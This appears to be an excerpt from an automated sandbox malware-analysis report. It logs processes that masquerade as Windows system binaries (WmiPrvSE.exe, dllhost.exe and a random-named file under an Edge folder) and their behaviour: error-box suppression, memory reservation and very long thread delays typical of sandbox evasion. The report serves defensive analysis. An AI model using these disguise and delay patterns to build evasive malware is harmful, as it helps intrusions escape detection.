Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\ddraw\dllhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Memory allocated: E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Memory allocated: 1A980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Memory allocated: 11E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Memory allocated: 1B100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Memory allocated: 1250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Memory allocated: 1B000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Memory allocated: 12F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Memory allocated: 1AD20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Memory allocated: 12B0000 memory reserve \| memory write watch
Source: C:\Windows\System32\ddraw\dllhost.exe	Memory allocated: 1AC60000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Memory allocated: EF0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Memory allocated: 1AC70000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 599874
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 599765
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 599656
Source: C:\Windows\System32\ddraw\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 599656
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Window / User API: threadDelayed 1295	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Window / User API: threadDelayed 594
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Window / User API: threadDelayed 596

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe TID: 7740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8112	Thread sleep count: 1295 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8112	Thread sleep count: 300 > 30	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8108	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 8024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe TID: 7988	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 8064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 8100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 1020	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 1020	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 1020	Thread sleep time: -599874s >= -30000s
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 3192	Thread sleep count: 594 > 30
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 1020	Thread sleep time: -599765s >= -30000s
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 1020	Thread sleep time: -599656s >= -30000s
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 7456	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\ddraw\dllhost.exe TID: 7012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7596	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7596	Thread sleep time: -599875s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7592	Thread sleep count: 596 > 30
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7596	Thread sleep time: -599765s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7596	Thread sleep time: -599656s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7688	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe TID: 7568	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
